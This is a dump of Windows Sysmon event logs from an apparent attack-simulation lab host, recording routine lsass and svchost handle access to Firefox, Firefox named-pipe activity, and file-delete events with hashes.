Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043496Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.326{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043495Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.326{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043494Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.325{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043493Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.325{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043492Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.325{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043491Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.325{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043490Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.325{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043489Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.325{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043488Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.324{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043487Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.324{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043486Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.324{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043485Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.324{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043484Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.324{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043483Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.323{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x800000000000000043482Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:59.321{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\chrome.3240.3.164118397C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000043481Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.279{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043480Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.279{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043479Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.175{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB4002EA7C680AFEB79D18D4D4086318,SHA256=97ACD91F850C323A83A852CFA85EDCC1475E6DC2DB3A8D87C7A246D6619D88EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043478Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.159{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043477Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.159{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043476Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.146{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043475Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.145{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043474Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:59.135{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\LOCAL\cubeb-pipe-3240-0C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000043473Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:59.135{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\LOCAL\cubeb-pipe-3240-0C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043472Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.135{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043471Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.135{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043470Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.113{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043469Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.104{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043468Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:59.100{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\gecko.3240.6744.18347881689759297914C:\Program Files\Mozilla Firefox\firefox.exe 